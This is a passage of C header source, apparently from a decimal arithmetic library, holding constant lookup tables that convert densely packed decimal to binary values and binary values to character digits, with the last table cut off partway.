475000, 476000, 477000, 478000, 479000, 496000, 497000, 874000, 875000, 898000, 899000, 500000, 501000, 502000, 503000, 504000, 505000, 506000, 507000, 508000, 509000, 580000, 581000, 904000, 905000, 984000, 985000, 510000, 511000, 512000, 513000, 514000, 515000, 516000, 517000, 518000, 519000, 590000, 591000, 914000, 915000, 994000, 995000, 520000, 521000, 522000, 523000, 524000, 525000, 526000, 527000, 528000, 529000, 582000, 583000, 924000, 925000, 948000, 949000, 530000, 531000, 532000, 533000, 534000, 535000, 536000, 537000, 538000, 539000, 592000, 593000, 934000, 935000, 958000, 959000, 540000, 541000, 542000, 543000, 544000, 545000, 546000, 547000, 548000, 549000, 584000, 585000, 944000, 945000, 588000, 589000, 550000, 551000, 552000, 553000, 554000, 555000, 556000, 557000, 558000, 559000, 594000, 595000, 954000, 955000, 598000, 599000, 560000, 561000, 562000, 563000, 564000, 565000, 566000, 567000, 568000, 569000, 586000, 587000, 964000, 965000, 988000, 989000, 570000, 571000, 572000, 573000, 574000, 575000, 576000, 577000, 578000, 579000, 596000, 597000, 974000, 975000, 998000, 999000, 600000, 601000, 602000, 603000, 604000, 605000, 606000, 607000, 608000, 609000, 680000, 681000, 806000, 807000, 886000, 887000, 610000, 611000, 612000, 613000, 614000, 615000, 616000, 617000, 618000, 619000, 690000, 691000, 816000, 817000, 896000, 897000, 620000, 621000, 622000, 623000, 624000, 625000, 626000, 627000, 628000, 629000, 682000, 683000, 826000, 827000, 
868000, 869000, 630000, 631000, 632000, 633000, 634000, 635000, 636000, 637000, 638000, 639000, 692000, 693000, 836000, 837000, 878000, 879000, 640000, 641000, 642000, 643000, 644000, 645000, 646000, 647000, 648000, 649000, 684000, 685000, 846000, 847000, 688000, 689000, 650000, 651000, 652000, 653000, 654000, 655000, 656000, 657000, 658000, 659000, 694000, 695000, 856000, 857000, 698000, 699000, 660000, 661000, 662000, 663000, 664000, 665000, 666000, 667000, 668000, 669000, 686000, 687000, 866000, 867000, 888000, 889000, 670000, 671000, 672000, 673000, 674000, 675000, 676000, 677000, 678000, 679000, 696000, 697000, 876000, 877000, 898000, 899000, 700000, 701000, 702000, 703000, 704000, 705000, 706000, 707000, 708000, 709000, 780000, 781000, 906000, 907000, 986000, 987000, 710000, 711000, 712000, 713000, 714000, 715000, 716000, 717000, 718000, 719000, 790000, 791000, 916000, 917000, 996000, 997000, 720000, 721000, 722000, 723000, 724000, 725000, 726000, 727000, 728000, 729000, 782000, 783000, 926000, 927000, 968000, 969000, 730000, 731000, 732000, 733000, 734000, 735000, 736000, 737000, 738000, 739000, 792000, 793000, 936000, 937000, 978000, 979000, 740000, 741000, 742000, 743000, 744000, 745000, 746000, 747000, 748000, 749000, 784000, 785000, 946000, 947000, 788000, 789000, 750000, 751000, 752000, 753000, 754000, 755000, 756000, 757000, 758000, 759000, 794000, 795000, 956000, 957000, 798000, 799000, 760000, 761000, 762000, 763000, 764000, 765000, 766000, 767000, 768000, 769000, 786000, 787000, 966000, 967000, 988000, 989000, 770000, 771000, 772000, 773000, 774000, 775000, 776000, 777000, 778000, 779000, 796000, 797000, 976000, 977000, 998000, 999000}; #endif #if defined(DEC_DPD2BINM) && DEC_DPD2BINM==1 && !defined(DECDPD2BINM) #define DECDPD2BINM const uint32_t DPD2BINM[1024]={0, 1000000, 2000000, 3000000, 4000000, 5000000, 6000000, 7000000, 8000000, 9000000, 80000000, 81000000, 800000000, 801000000, 880000000, 881000000, 10000000, 11000000, 12000000, 13000000, 14000000, 15000000, 16000000, 17000000, 18000000, 19000000, 90000000, 91000000, 810000000, 811000000, 890000000, 891000000, 20000000, 21000000, 22000000, 23000000, 24000000, 25000000, 26000000, 27000000, 28000000, 29000000, 82000000, 83000000, 820000000, 821000000, 808000000, 809000000, 30000000, 31000000, 32000000, 33000000, 34000000, 35000000, 36000000, 37000000, 38000000, 39000000, 92000000, 93000000, 830000000, 831000000, 818000000, 819000000, 40000000, 41000000, 42000000, 43000000, 44000000, 45000000, 46000000, 47000000, 48000000, 49000000, 84000000, 85000000, 840000000, 841000000, 88000000, 89000000, 50000000, 51000000, 52000000, 53000000, 54000000, 55000000, 56000000, 57000000, 58000000, 59000000, 94000000, 95000000, 850000000, 851000000, 98000000, 99000000, 60000000, 61000000, 62000000, 63000000, 64000000, 65000000, 66000000, 67000000, 68000000, 69000000, 86000000, 87000000, 860000000, 861000000, 888000000, 889000000, 70000000, 71000000, 72000000, 73000000, 74000000, 75000000, 76000000, 77000000, 78000000, 79000000, 96000000, 97000000, 870000000, 871000000, 898000000, 899000000, 100000000, 101000000, 102000000, 103000000, 104000000, 105000000, 106000000, 107000000, 108000000, 109000000, 180000000, 181000000, 900000000, 901000000, 980000000, 981000000, 110000000, 111000000, 112000000, 113000000, 114000000, 115000000, 116000000, 117000000, 118000000, 119000000, 190000000, 191000000, 910000000, 911000000, 990000000, 991000000, 120000000, 121000000, 122000000, 123000000, 124000000, 125000000, 126000000, 127000000, 128000000, 
129000000, 182000000, 183000000, 920000000, 921000000, 908000000, 909000000, 130000000, 131000000, 132000000, 133000000, 134000000, 135000000, 136000000, 137000000, 138000000, 139000000, 192000000, 193000000, 930000000, 931000000, 918000000, 919000000, 140000000, 141000000, 142000000, 143000000, 144000000, 145000000, 146000000, 147000000, 148000000, 149000000, 184000000, 185000000, 940000000, 941000000, 188000000, 189000000, 150000000, 151000000, 152000000, 153000000, 154000000, 155000000, 156000000, 157000000, 158000000, 159000000, 194000000, 195000000, 950000000, 951000000, 198000000, 199000000, 160000000, 161000000, 162000000, 163000000, 164000000, 165000000, 166000000, 167000000, 168000000, 169000000, 186000000, 187000000, 960000000, 961000000, 988000000, 989000000, 170000000, 171000000, 172000000, 173000000, 174000000, 175000000, 176000000, 177000000, 178000000, 179000000, 196000000, 197000000, 970000000, 971000000, 998000000, 999000000, 200000000, 201000000, 202000000, 203000000, 204000000, 205000000, 206000000, 207000000, 208000000, 209000000, 280000000, 281000000, 802000000, 803000000, 882000000, 883000000, 210000000, 211000000, 212000000, 213000000, 214000000, 215000000, 216000000, 217000000, 218000000, 219000000, 290000000, 291000000, 812000000, 813000000, 892000000, 893000000, 220000000, 221000000, 222000000, 223000000, 224000000, 225000000, 226000000, 227000000, 228000000, 229000000, 282000000, 283000000, 822000000, 823000000, 828000000, 829000000, 230000000, 231000000, 232000000, 233000000, 234000000, 235000000, 236000000, 237000000, 238000000, 239000000, 292000000, 293000000, 832000000, 833000000, 838000000, 839000000, 240000000, 241000000, 242000000, 243000000, 244000000, 245000000, 246000000, 247000000, 248000000, 249000000, 284000000, 285000000, 842000000, 843000000, 288000000, 289000000, 250000000, 251000000, 252000000, 253000000, 254000000, 255000000, 256000000, 257000000, 258000000, 259000000, 294000000, 295000000, 852000000, 853000000, 298000000, 299000000, 260000000, 261000000, 262000000, 263000000, 264000000, 265000000, 266000000, 267000000, 268000000, 269000000, 286000000, 287000000, 862000000, 863000000, 888000000, 889000000, 270000000, 271000000, 272000000, 273000000, 274000000, 275000000, 276000000, 277000000, 278000000, 279000000, 296000000, 297000000, 872000000, 873000000, 898000000, 899000000, 300000000, 301000000, 302000000, 303000000, 304000000, 305000000, 306000000, 307000000, 308000000, 309000000, 380000000, 381000000, 902000000, 903000000, 982000000, 983000000, 310000000, 311000000, 312000000, 313000000, 314000000, 315000000, 316000000, 317000000, 318000000, 319000000, 390000000, 391000000, 912000000, 913000000, 992000000, 993000000, 320000000, 321000000, 322000000, 323000000, 324000000, 325000000, 326000000, 327000000, 328000000, 329000000, 382000000, 383000000, 922000000, 923000000, 928000000, 929000000, 330000000, 331000000, 332000000, 333000000, 334000000, 335000000, 336000000, 337000000, 338000000, 339000000, 392000000, 393000000, 932000000, 933000000, 938000000, 939000000, 340000000, 341000000, 342000000, 343000000, 344000000, 345000000, 346000000, 347000000, 348000000, 349000000, 384000000, 385000000, 942000000, 943000000, 388000000, 389000000, 350000000, 351000000, 352000000, 353000000, 354000000, 355000000, 356000000, 357000000, 358000000, 359000000, 394000000, 395000000, 952000000, 953000000, 398000000, 399000000, 360000000, 361000000, 362000000, 363000000, 364000000, 365000000, 366000000, 367000000, 368000000, 369000000, 386000000, 387000000, 
962000000, 963000000, 988000000, 989000000, 370000000, 371000000, 372000000, 373000000, 374000000, 375000000, 376000000, 377000000, 378000000, 379000000, 396000000, 397000000, 972000000, 973000000, 998000000, 999000000, 400000000, 401000000, 402000000, 403000000, 404000000, 405000000, 406000000, 407000000, 408000000, 409000000, 480000000, 481000000, 804000000, 805000000, 884000000, 885000000, 410000000, 411000000, 412000000, 413000000, 414000000, 415000000, 416000000, 417000000, 418000000, 419000000, 490000000, 491000000, 814000000, 815000000, 894000000, 895000000, 420000000, 421000000, 422000000, 423000000, 424000000, 425000000, 426000000, 427000000, 428000000, 429000000, 482000000, 483000000, 824000000, 825000000, 848000000, 849000000, 430000000, 431000000, 432000000, 433000000, 434000000, 435000000, 436000000, 437000000, 438000000, 439000000, 492000000, 493000000, 834000000, 835000000, 858000000, 859000000, 440000000, 441000000, 442000000, 443000000, 444000000, 445000000, 446000000, 447000000, 448000000, 449000000, 484000000, 485000000, 844000000, 845000000, 488000000, 489000000, 450000000, 451000000, 452000000, 453000000, 454000000, 455000000, 456000000, 457000000, 458000000, 459000000, 494000000, 495000000, 854000000, 855000000, 498000000, 499000000, 460000000, 461000000, 462000000, 463000000, 464000000, 465000000, 466000000, 467000000, 468000000, 469000000, 486000000, 487000000, 864000000, 865000000, 888000000, 889000000, 470000000, 471000000, 472000000, 473000000, 474000000, 475000000, 476000000, 477000000, 478000000, 479000000, 496000000, 497000000, 874000000, 875000000, 898000000, 899000000, 500000000, 501000000, 502000000, 503000000, 504000000, 505000000, 506000000, 507000000, 508000000, 509000000, 580000000, 581000000, 904000000, 905000000, 984000000, 985000000, 510000000, 511000000, 512000000, 513000000, 514000000, 515000000, 516000000, 517000000, 518000000, 519000000, 590000000, 591000000, 914000000, 915000000, 994000000, 995000000, 520000000, 521000000, 522000000, 523000000, 524000000, 525000000, 526000000, 527000000, 528000000, 529000000, 582000000, 583000000, 924000000, 925000000, 948000000, 949000000, 530000000, 531000000, 532000000, 533000000, 534000000, 535000000, 536000000, 537000000, 538000000, 539000000, 592000000, 593000000, 934000000, 935000000, 958000000, 959000000, 540000000, 541000000, 542000000, 543000000, 544000000, 545000000, 546000000, 547000000, 548000000, 549000000, 584000000, 585000000, 944000000, 945000000, 588000000, 589000000, 550000000, 551000000, 552000000, 553000000, 554000000, 555000000, 556000000, 557000000, 558000000, 559000000, 594000000, 595000000, 954000000, 955000000, 598000000, 599000000, 560000000, 561000000, 562000000, 563000000, 564000000, 565000000, 566000000, 567000000, 568000000, 569000000, 586000000, 587000000, 964000000, 965000000, 988000000, 989000000, 570000000, 571000000, 572000000, 573000000, 574000000, 575000000, 576000000, 577000000, 578000000, 579000000, 596000000, 597000000, 974000000, 975000000, 998000000, 999000000, 600000000, 601000000, 602000000, 603000000, 604000000, 605000000, 606000000, 607000000, 608000000, 609000000, 680000000, 681000000, 806000000, 807000000, 886000000, 887000000, 610000000, 611000000, 612000000, 613000000, 614000000, 615000000, 616000000, 617000000, 618000000, 619000000, 690000000, 691000000, 816000000, 817000000, 896000000, 897000000, 620000000, 621000000, 622000000, 623000000, 624000000, 625000000, 626000000, 627000000, 628000000, 629000000, 682000000, 683000000, 826000000, 827000000, 868000000, 
869000000, 630000000, 631000000, 632000000, 633000000, 634000000, 635000000, 636000000, 637000000, 638000000, 639000000, 692000000, 693000000, 836000000, 837000000, 878000000, 879000000, 640000000, 641000000, 642000000, 643000000, 644000000, 645000000, 646000000, 647000000, 648000000, 649000000, 684000000, 685000000, 846000000, 847000000, 688000000, 689000000, 650000000, 651000000, 652000000, 653000000, 654000000, 655000000, 656000000, 657000000, 658000000, 659000000, 694000000, 695000000, 856000000, 857000000, 698000000, 699000000, 660000000, 661000000, 662000000, 663000000, 664000000, 665000000, 666000000, 667000000, 668000000, 669000000, 686000000, 687000000, 866000000, 867000000, 888000000, 889000000, 670000000, 671000000, 672000000, 673000000, 674000000, 675000000, 676000000, 677000000, 678000000, 679000000, 696000000, 697000000, 876000000, 877000000, 898000000, 899000000, 700000000, 701000000, 702000000, 703000000, 704000000, 705000000, 706000000, 707000000, 708000000, 709000000, 780000000, 781000000, 906000000, 907000000, 986000000, 987000000, 710000000, 711000000, 712000000, 713000000, 714000000, 715000000, 716000000, 717000000, 718000000, 719000000, 790000000, 791000000, 916000000, 917000000, 996000000, 997000000, 720000000, 721000000, 722000000, 723000000, 724000000, 725000000, 726000000, 727000000, 728000000, 729000000, 782000000, 783000000, 926000000, 927000000, 968000000, 969000000, 730000000, 731000000, 732000000, 733000000, 734000000, 735000000, 736000000, 737000000, 738000000, 739000000, 792000000, 793000000, 936000000, 937000000, 978000000, 979000000, 740000000, 741000000, 742000000, 743000000, 744000000, 745000000, 746000000, 747000000, 748000000, 749000000, 784000000, 785000000, 946000000, 947000000, 788000000, 789000000, 750000000, 751000000, 752000000, 753000000, 754000000, 755000000, 756000000, 757000000, 758000000, 759000000, 794000000, 795000000, 956000000, 957000000, 798000000, 799000000, 760000000, 761000000, 762000000, 763000000, 764000000, 765000000, 766000000, 767000000, 768000000, 769000000, 786000000, 787000000, 966000000, 967000000, 988000000, 989000000, 770000000, 771000000, 772000000, 773000000, 774000000, 775000000, 776000000, 777000000, 778000000, 779000000, 796000000, 797000000, 976000000, 977000000, 998000000, 999000000}; #endif #if defined(DEC_BIN2CHAR) && DEC_BIN2CHAR==1 && !defined(DECBIN2CHAR) #define DECBIN2CHAR const uint8_t BIN2CHAR[4001]={ '\0','0','0','0', '\1','0','0','1', '\1','0','0','2', '\1','0','0','3', '\1','0','0','4', '\1','0','0','5', '\1','0','0','6', '\1','0','0','7', '\1','0','0','8', '\1','0','0','9', '\2','0','1','0', '\2','0','1','1', '\2','0','1','2', '\2','0','1','3', '\2','0','1','4', '\2','0','1','5', '\2','0','1','6', '\2','0','1','7', '\2','0','1','8', '\2','0','1','9', '\2','0','2','0', '\2','0','2','1', '\2','0','2','2', '\2','0','2','3', '\2','0','2','4', '\2','0','2','5', '\2','0','2','6', '\2','0','2','7', '\2','0','2','8', '\2','0','2','9', '\2','0','3','0', '\2','0','3','1', '\2','0','3','2', '\2','0','3','3', '\2','0','3','4', '\2','0','3','5', '\2','0','3','6', '\2','0','3','7', '\2','0','3','8', '\2','0','3','9', '\2','0','4','0', '\2','0','4','1', '\2','0','4','2', '\2','0','4','3', '\2','0','4','4', '\2','0','4','5', '\2','0','4','6', '\2','0','4','7', '\2','0','4','8', '\2','0','4','9', '\2','0','5','0', '\2','0','5','1', '\2','0','5','2', '\2','0','5','3', '\2','0','5','4', '\2','0','5','5', '\2','0','5','6', '\2','0','5','7', '\2','0','5','8', '\2','0','5','9', '\2','0','6','0', '\2','0','6','1', 
'\2','0','6','2', '\2','0','6','3', '\2','0','6','4', '\2','0','6','5', '\2','0','6','6', '\2','0','6','7', '\2','0','6','8', '\2','0','6','9', '\2','0','7','0', '\2','0','7','1', '\2','0','7','2', '\2','0','7','3', '\2','0','7','4', '\2','0','7','5', '\2','0','7','6', '\2','0','7','7', '\2','0','7','8', '\2','0','7','9', '\2','0','8','0', '\2','0','8','1', '\2','0','8','2', '\2','0','8','3', '\2','0','8','4', '\2','0','8','5', '\2','0','8','6', '\2','0','8','7', '\2','0','8','8', '\2','0','8','9', '\2','0','9','0', '\2','0','9','1', '\2','0','9','2', '\2','0','9','3', '\2','0','9','4', '\2','0','9','5', '\2','0','9','6', '\2','0','9','7', '\2','0','9','8', '\2','0','9','9', '\3','1','0','0', '\3','1','0','1', '\3','1','0','2', '\3','1','0','3', '\3','1','0','4', '\3','1','0','5', '\3','1','0','6', '\3','1','0','7', '\3','1','0','8', '\3','1','0','9', '\3','1','1','0', '\3','1','1','1', '\3','1','1','2', '\3','1','1','3', '\3','1','1','4', '\3','1','1','5', '\3','1','1','6', '\3','1','1','7', '\3','1','1','8', '\3','1','1','9', '\3','1','2','0', '\3','1','2','1', '\3','1','2','2', '\3','1','2','3', '\3','1','2','4', '\3','1','2','5', '\3','1','2','6', '\3','1','2','7', '\3','1','2','8', '\3','1','2','9', '\3','1','3','0', '\3','1','3','1', '\3','1','3','2', '\3','1','3','3', '\3','1','3','4', '\3','1','3','5', '\3','1','3','6', '\3','1','3','7', '\3','1','3','8', '\3','1','3','9', '\3','1','4','0', '\3','1','4','1', '\3','1','4','2', '\3','1','4','3', '\3','1','4','4', '\3','1','4','5', '\3','1','4','6', '\3','1','4','7', '\3','1','4','8', '\3','1','4','9', '\3','1','5','0', '\3','1','5','1', '\3','1','5','2', '\3','1','5','3', '\3','1','5','4', '\3','1','5','5', '\3','1','5','6', '\3','1','5','7', '\3','1','5','8', '\3','1','5','9', '\3','1','6','0', '\3','1','6','1', '\3','1','6','2', '\3','1','6','3', '\3','1','6','4', '\3','1','6','5', '\3','1','6','6', '\3','1','6','7', '\3','1','6','8', '\3','1','6','9', '\3','1','7','0', '\3','1','7','1', '\3','1','7','2', '\3','1','7','3', '\3','1','7','4', '\3','1','7','5', '\3','1','7','6', '\3','1','7','7', '\3','1','7','8', '\3','1','7','9', '\3','1','8','0', '\3','1','8','1', '\3','1','8','2', '\3','1','8','3', '\3','1','8','4', '\3','1','8','5', '\3','1','8','6', '\3','1','8','7', '\3','1','8','8', '\3','1','8','9', '\3','1','9','0', '\3','1','9','1', '\3','1','9','2', '\3','1','9','3', '\3','1','9','4', '\3','1','9','5', '\3','1','9','6', '\3','1','9','7', '\3','1','9','8', '\3','1','9','9', '\3','2','0','0', '\3','2','0','1', '\3','2','0','2', '\3','2','0','3', '\3','2','0','4', '\3','2','0','5', '\3','2','0','6', '\3','2','0','7', '\3','2','0','8', '\3','2','0','9', '\3','2','1','0', '\3','2','1','1', '\3','2','1','2', '\3','2','1','3', '\3','2','1','4', '\3','2','1','5', '\3','2','1','6', '\3','2','1','7', '\3','2','1','8', '\3','2','1','9', '\3','2','2','0', '\3','2','2','1', '\3','2','2','2', '\3','2','2','3', '\3','2','2','4', '\3','2','2','5', '\3','2','2','6', '\3','2','2','7', '\3','2','2','8', '\3','2','2','9', '\3','2','3','0', '\3','2','3','1', '\3','2','3','2', '\3','2','3','3', '\3','2','3','4', '\3','2','3','5', '\3','2','3','6', '\3','2','3','7', '\3','2','3','8', '\3','2','3','9', '\3','2','4','0', '\3','2','4','1', '\3','2','4','2', '\3','2','4','3', '\3','2','4','4', '\3','2','4','5', '\3','2','4','6', '\3','2','4','7', '\3','2','4','8', '\3','2','4','9', '\3','2','5','0', '\3','2','5','1', '\3','2','5','2', '\3','2','5','3', '\3','2','5','4', '\3','2','5','5', '\3','2','5','6', '\3','2','5','7', '\3','2','5','8', 
'\3','2','5','9', '\3','2','6','0', '\3','2','6','1', '\3','2','6','2', '\3','2','6','3', '\3','2','6','4', '\3','2','6','5', '\3','2','6','6', '\3','2','6','7', '\3','2','6','8', '\3','2','6','9', '\3','2','7','0', '\3','2','7','1', '\3','2','7','2', '\3','2','7','3', '\3','2','7','4', '\3','2','7','5', '\3','2','7','6', '\3','2','7','7', '\3','2','7','8', '\3','2','7','9', '\3','2','8','0', '\3','2','8','1', '\3','2','8','2', '\3','2','8','3', '\3','2','8','4', '\3','2','8','5', '\3','2','8','6', '\3','2','8','7', '\3','2','8','8', '\3','2','8','9', '\3','2','9','0', '\3','2','9','1', '\3','2','9','2', '\3','2','9','3', '\3','2','9','4', '\3','2','9','5', '\3','2','9','6', '\3','2','9','7', '\3','2','9','8', '\3','2','9','9', '\3','3','0','0', '\3','3','0','1', '\3','3','0','2', '\3','3','0','3', '\3','3','0','4', '\3','3','0','5', '\3','3','0','6', '\3','3','0','7', '\3','3','0','8', '\3','3','0','9', '\3','3','1','0', '\3','3','1','1', '\3','3','1','2', '\3','3','1','3', '\3','3','1','4', '\3','3','1','5', '\3','3','1','6', '\3','3','1','7', '\3','3','1','8', '\3','3','1','9', '\3','3','2','0', '\3','3','2','1', '\3','3','2','2', '\3','3','2','3', '\3','3','2','4', '\3','3','2','5', '\3','3','2','6', '\3','3','2','7', '\3','3','2','8', '\3','3','2','9', '\3','3','3','0', '\3','3','3','1', '\3','3','3','2', '\3','3','3','3', '\3','3','3','4', '\3','3','3','5', '\3','3','3','6', '\3','3','3','7', '\3','3','3','8', '\3','3','3','9', '\3','3','4','0', '\3','3','4','1', '\3','3','4','2', '\3','3','4','3', '\3','3','4','4', '\3','3','4','5', '\3','3','4','6', '\3','3','4','7', '\3','3','4','8', '\3','3','4','9', '\3','3','5','0', '\3','3','5','1', '\3','3','5','2', '\3','3','5','3', '\3','3','5','4', '\3','3','5','5', '\3','3','5','6', '\3','3','5','7', '\3','3','5','8', '\3','3','5','9', '\3','3','6','0', '\3','3','6','1', '\3','3','6','2', '\3','3','6','3', '\3','3','6','4', '\3','3','6','5', '\3','3','6','6', '\3','3','6','7', '\3','3','6','8', '\3','3','6','9', '\3','3','7','0', '\3','3','7','1', '\3','3','7','2', '\3','3','7','3', '\3','3','7','4', '\3','3','7','5', '\3','3','7','6', '\3','3','7','7', '\3','3','7','8', '\3','3','7','9', '\3','3','8','0', '\3','3','8','1', '\3','3','8','2', '\3','3','8','3', '\3','3','8','4', '\3','3','8','5', '\3','3','8','6', '\3','3','8','7', '\3','3','8','8', '\3','3','8','9', '\3','3','9','0', '\3','3','9','1', '\3','3','9','2', '\3','3','9','3', '\3','3','9','4', '\3','3','9','5', '\3','3','9','6', '\3','3','9','7', '\3','3','9','8', '\3','3','9','9', '\3','4','0','0', '\3','4','0','1', '\3','4','0','2', '\3','4','0','3', '\3','4','0','4', '\3','4','0','5', '\3','4','0','6', '\3','4','0','7', '\3','4','0','8', '\3','4','0','9', '\3','4','1','0', '\3','4','1','1', '\3','4','1','2', '\3','4','1','3', '\3','4','1','4', '\3','4','1','5', '\3','4','1','6', '\3','4','1','7', '\3','4','1','8', '\3','4','1','9', '\3','4','2','0', '\3','4','2','1', '\3','4','2','2', '\3','4','2','3', '\3','4','2','4', '\3','4','2','5', '\3','4','2','6', '\3','4','2','7', '\3','4','2','8', '\3','4','2','9', '\3','4','3','0', '\3','4','3','1', '\3','4','3','2', '\3','4','3','3', '\3','4','3','4', '\3','4','3','5', '\3','4','3','6', '\3','4','3','7', '\3','4','3','8', '\3','4','3','9', '\3','4','4','0', '\3','4','4','1', '\3','4','4','2', '\3','4','4','3', '\3','4','4','4', '\3','4','4','5', '\3','4','4','6', '\3','4','4','7', '\3','4','4','8', '\3','4','4','9', '\3','4','5','0', '\3','4','5','1', '\3','4','5','2', '\3','4','5','3', '\3','4','5','4', '\3','4','5','5', 
'\3','4','5','6', '\3','4','5','7', '\3','4','5','8', '\3','4','5','9', '\3','4','6','0', '\3','4','6','1', '\3','4','6','2', '\3','4','6','3', '\3','4','6','4', '\3','4','6','5', '\3','4','6','6', '\3','4','6','7', '\3','4','6','8', '\3','4','6','9', '\3','4','7','0', '\3','4','7','1', '\3','4','7','2', '\3','4','7','3', '\3','4','7','4', '\3','4','7','5', '\3','4','7','6', '\3','4','7','7', '\3','4','7','8', '\3','4','7','9', '\3','4','8','0', '\3','4','8','1', '\3','4','8','2', '\3','4','8','3', '\3','4','8','4', '\3','4','8','5', '\3','4','8','6', '\3','4','8','7', '\3','4','8','8', '\3','4','8','9', '\3','4','9','0', '\3','4','9','1', '\3','4','9','2', '\3','4','9','3', '\3','4','9','4', '\3','4','9','5', '\3','4','9','6', '\3','4','9','7', '\3','4','9','8', '\3','4','9','9', '\3','5','0','0', '\3','5','0','1', '\3','5','0','2', '\3','5','0','3', '\3','5','0','4', '\3','5','0','5', '\3','5','0','6', '\3','5','0','7', '\3','5','0','8', '\3','5','0','9', '\3','5','1','0', '\3','5','1','1', '\3','5','1','2', '\3','5','1','3', '\3','5','1','4', '\3','5','1','5', '\3','5','1','6', '\3','5','1','7', '\3','5','1','8', '\3','5','1','9', '\3','5','2','0', '\3','5','2','1', '\3','5','2','2', '\3','5','2','3', '\3','5','2','4', '\3','5','2','5', '\3','5','2','6', '\3','5','2','7', '\3','5','2','8', '\3','5','2','9', '\3','5','3','0', '\3','5','3','1', '\3','5','3','2', '\3','5','3','3', '\3','5','3','4', '\3','5','3','5', '\3','5','3','6', '\3','5','3','7', '\3','5','3','8', '\3','5','3','9', '\3','5','4','0', '\3','5','4','1', '\3','5','4','2', '\3','5','4','3', '\3','5','4','4', '\3','5','4','5', '\3','5','4','6', '\3','5','4','7', '\3','5','4','8', '\3','5','4','9', '\3','5','5','0', '\3','5','5','1', '\3','5','5','2', '\3','5','5','3', '\3','5','5','4', '\3','5','5','5', '\3','5','5','6', '\3','5','5','7', '\3','5','5','8', '\3','5','5','9', '\3','5','6','0', '\3','5','6','1', '\3','5','6','2', '\3','5','6','3', '\3','5','6','4', '\3','5','6','5', '\3','5','6','6', '\3','5','6','7', '\3','5','6','8', '\3','5','6','9', '\3','5','7','0', '\3','5','7','1', '\3','5','7','2', '\3','5','7','3', '\3','5','7','4', '\3','5','7','5', '\3','5','7','6', '\3','5','7','7', '\3','5','7','8', '\3','5','7','9', '\3','5','8','0', '\3','5','8','1', '\3','5','8','2', '\3','5','8','3', '\3','5','8','4', '\3','5','8','5', '\3','5','8','6', '\3','5','8','7', '\3','5','8','8', '\3','5','8','9', '\3','5','9','0', '\3','5','9','1', '\3','5','9','2', '\3','5','9','3', '\3','5','9','4', '\3','5','9','5', '\3','5','9','6', '\3','5','9','7', '\3','5','9','8', '\3','5','9','9', '\3','6','0','0', '\3','6','0','1', '\3','6','0','2', '\3','6','0','3', '\3','6','0','4', '\3','6','0','5', '\3','6','0','6', '\3','6','0','7', '\3','6','0','8', '\3','6','0','9', '\3','6','1','0', '\3','6','1','1', '\3','6','1','2', '\3','6','1','3', '\3','6','1','4', '\3','6','1','5', '\3','6','1','6', '\3','6','1','7', '\3','6','1','8', '\3','6','1','9', '\3','6','2','0', '\3','6','2','1', '\3','6','2','2', '\3','6','2','3', '\3','6','2','4', '\3','6','2','5', '\3','6','2','6', '\3','6','2','7', '\3','6','2','8', '\3','6','2','9', '\3','6','3','0', '\3','6','3','1', '\3','6','3','2', '\3','6','3','3', '\3','6','3','4', '\3','6','3','5', '\3','6','3','6', '\3','6','3','7', '\3','6','3','8', '\3','6','3','9', '\3','6','4','0', '\3','6','4','1', '\3','6','4','2', '\3','6','4','3', '\3','6','4','4', '\3','6','4','5', '\3','6','4','6', '\3','6','4','7', '\3','6','4','8', '\3','6','4','9', '\3','6','5','0', '\3','6','5','1', '\3','6','5','2', 
'\3','6','5','3', '\3','6','5','4', '\3','6','5','5', '\3','6','5','6', '\3','6','5','7', '\3','6','5','8', '\3','6','5','9', '\3','6','6','0', '\3','6','6','1', '\3','6','6','2', '\3','6','6','3', '\3','6','6','4', '\3','6','6','5', '\3','6','6','6', '\3','6','6','7', '\3','6','6','8', '\3','6','6','9', '\3','6','7','0', '\3','6','7','1', '\3','6','7','2', '\3','6','7','3', '\3','6','7','4', '\3','6','7','5', '\3','6','7','6', '\3','6','7','7', '\3','6','7','8', '\3','6','7','9', '\3','6','8','0', '\3','6','8','1', '\3','6','8','2', '\3','6','8','3', '\3','6','8','4', '\3','6','8','5', '\3','6','8','6', '\3','6','8','7', '\3','6','8','8', '\3','6','8','9', '\3','6','9','0', '\3','6','9','1', '\3','6','9','2', '\3','6','9','3', '\3','6','9','4', '\3','6','9','5', '\3','6','9','6', '\3','6','9','7', '\3','6','9','8', '\3','6','9','9', '\3','7','0','0', '\3','7','0','1', '\3','7','0','2', '\3','7','0','3', '\3','7','0','4', '\3','7','0','5', '\3','7','0','6', '\3','7','0','7', '\3','7','0','8', '\3','7','0','9', '\3','7','1','0', '\3','7','1','1', '\3','7','1','2', '\3','7','1','3', '\3','7','1','4', '\3','7','1','5', '\3','7','1','6', '\3','7','1','7', '\3','7','1','8', '\3','7','1','9', '\3','7','2','0', '\3','7','2','1', '\3','7','2','2', '\3','7','2','3', '\3','7','2','4', '\3','7','2','5', '\3','7','2','6', '\3','7','2','7', '\3','7','2','8', '\3','7','2','9', '\3','7','3','0', '\3','7','3','1', '\3','7','3','2', '\3','7','3','3', '\3','7','3','4', '\3','7','3','5', '\3','7','3','6', '\3','7','3','7', '\3','7','3','8', '\3','7','3','9', '\3','7','4','0', '\3','7','4','1', '\3','7','4','2', '\3','7','4','3', '\3','7','4','4', '\3','7','4','5', '\3','7','4','6', '\3','7','4','7', '\3','7','4','8', '\3','7','4','9', '\3','7','5','0', '\3','7','5','1', '\3','7','5','2', '\3','7','5','3', '\3','7','5','4', '\3','7','5','5', '\3','7','5','6', '\3','7','5','7', '\3','7','5','8', '\3','7','5','9', '\3','7','6','0', '\3','7','6','1', '\3','7','6','2', '\3','7','6','3', '\3','7','6','4', '\3','7','6','5', '\3','7','6','6', '\3','7','6','7', '\3','7','6','8', '\3','7','6','9', '\3','7','7','0', '\3','7','7','1', '\3','7','7','2', '\3','7','7','3', '\3','7','7','4', '\3','7','7','5', '\3','7','7','6', '\3','7','7','7', '\3','7','7','8', '\3','7','7','9', '\3','7','8','0', '\3','7','8','1', '\3','7','8','2', '\3','7','8','3', '\3','7','8','4', '\3','7','8','5', '\3','7','8','6', '\3','7','8','7', '\3','7','8','8', '\3','7','8','9', '\3','7','9','0', '\3','7','9','1', '\3','7','9','2', '\3','7','9','3', '\3','7','9','4', '\3','7','9','5', '\3','7','9','6', '\3','7','9','7', '\3','7','9','8', '\3','7','9','9', '\3','8','0','0', '\3','8','0','1', '\3','8','0','2', '\3','8','0','3', '\3','8','0','4', '\3','8','0','5', '\3','8','0','6', '\3','8','0','7', '\3','8','0','8', '\3','8','0','9', '\3','8','1','0', '\3','8','1','1', 